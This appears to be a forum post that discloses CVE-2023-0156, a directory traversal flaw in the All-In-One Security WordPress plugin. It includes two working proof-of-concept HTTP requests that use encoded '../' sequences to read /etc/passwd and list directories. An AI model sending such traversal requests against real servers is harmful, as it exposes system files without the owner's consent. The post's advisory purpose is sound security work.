• We just launched and are currently in beta. Join us as we build and grow the community.

WordPress Plugin CVE-2023-0156

TheJooj

Phishing Simulation Expert
T Rep
0
0
0
Rep
0
T Vouches
0
0
0
Vouches
0
Posts
205
Likes
198
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 300 XP
CVE ID: CVE-2023-0156
Vulnerability Type: Directory Traversal
Description: The All-In-One Security (AIOS) plugin for WordPress is vulnerable to directory traversal in versions up to, and including, 5.1.4. This allows authenticated attackers with administrator-level permissions to read the contents of arbitrary files on the server.
Steps to reproduce:
Code:
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2 Host: <host> Cookie: <cookies> Content-Length: 125 Content-Type: application/x-www-form-urlencoded _wpnonce=<nonce>&aiowps_system_log_file=..%2F..%2F..%2F..%2Fetc%2Fpasswd&aiowps_search_error_files=View+latest+system+logs
Code:
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2 Host: <host> Cookie: <cookies> Content-Length: 98 Content-Type: application/x-www-form-urlencoded _wpnonce=<nonce>&aiowps_system_log_file=..%2F&aiowps_search_error_files=View+latest+system+logs
Link:
Reference:
 

440,010

316,559

316,568

Top